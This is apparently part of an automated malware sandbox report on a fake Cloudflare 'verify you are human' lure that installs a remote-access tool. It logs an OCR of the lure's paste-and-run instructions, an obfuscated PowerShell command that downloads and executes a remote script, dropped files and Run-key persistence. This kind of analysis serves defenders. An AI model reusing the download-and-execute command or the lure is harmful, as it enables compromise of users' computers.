                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: samcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: dbghelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: dbgcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: nslsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: devobj.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: pcihooks.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: riched32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: pciinv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: firewallapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: fwbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                                  Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\bpsFyf\client32.iniJump to behavior
                                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeFile opened: C:\Users\user\AppData\Roaming\bpsFyf\MSVCR100.dllJump to behavior
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2429888490.0000000073D72000.00000002.00000001.01000000.00000010.sdmp, PCICHEK.DLL.12.dr
                                  Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000015.00000002.2427957833.0000000073C41000.00000020.00000001.01000000.00000012.sdmp, msvcr100.dll.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000000C.00000002.1977374778.000002F201CA8000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000015.00000002.2405808800.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000015.00000000.1975726137.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, client32.exe.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, HTCTL32.DLL.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000015.00000002.2429698530.0000000073D55000.00000002.00000001.01000000.00000011.sdmp, pcicapi.dll.12.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.12.dr

                                  Data Obfuscation

                                  barindex
                                  Suspicious powershell command line found
                                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
                                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,21_2_11029590
                                  Source: PCICL32.DLL.12.drStatic PE information: section name: .hhshare
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB7114AED push ebx; retf 0064h12_2_00007FFEB7114B1A
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB75C66D8 pushad ; retf 12_2_00007FFEB75C66D9
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB78702CA pushad ; iretd 12_2_00007FFEB78702CB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB78702BA push eax; iretd 12_2_00007FFEB78702BB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB7A433F4 push esp; iretd 12_2_00007FFEB7A433F5
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1116F055 push ecx; ret 21_2_1116F068
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11169F49 push ecx; ret 21_2_11169F5C
                                  Source: msvcr100.dll.12.drStatic PE information: section name: .text entropy: 6.909044922675825

                                  Persistence and Installation Behavior

                                  barindex
                                  Detect drive by download via clipboard copy & paste
                                  Source: Chrome DOM: 2.3OCR Text: CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window, press Ctrl + V. 3. Press Enter on your keyboard to finish. conn You will observe and agree: "Versify you are hutzri - Ray Verification 3293" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare
                                  Source: screenshotOCR Text: x e about:blank X Just a moment.. inspyrehomedesign.com CloudFlare Veri g the action below. Complete these Verification Steps ENG English (United Kingdom) To better prove you are not a robot, please: SG Swiss German keyboard ENG English (United Kingdom) 1. Press & hold the Windows Key + R Clou urity of your DE German keyboard 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 3293" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare 14:45 ENG p Type here to search 28/10/2024
                                  Source: screenshotOCR Text: x e about:blank X Just a moment.. inspyrehomedesign.com CloudFlare Veri g the action below. Complete these Verification Steps To better prove you are not a robot, please: 1. Press & hold the Windows Key + R Clou urity of your 2. In the verification window press Ctrl + V. 3. Press Enter on your keyboard to finish conn You will observe and agree: "Versify you are human - Ray Verification TID: 3293" Perform the steps above to VERIFY finish verification. Performance & security by Cloudflare 14:45 ENG p Type here to search SG 28/10/2024
                                  Uses ipconfig to lookup or modify the Windows network settings
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\msvcr100.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\pcicapi.dllJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\PCICHEK.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\PCICL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLLJump to dropped file
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,21_2_11127E10
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,21_2_11139090
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,21_2_1115B1D0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,21_2_11113290
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,21_2_110CB2B0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,21_2_110CB2B0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,21_2_110254A0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,21_2_110258F0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,21_2_11023BA0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,21_2_11024280
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11112670 IsIconic,GetTickCount,21_2_11112670
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,21_2_111229D0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,21_2_111229D0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,21_2_110C0BB0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,21_2_1115ADD0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,21_2_1115ADD0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,21_2_11143570
                                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
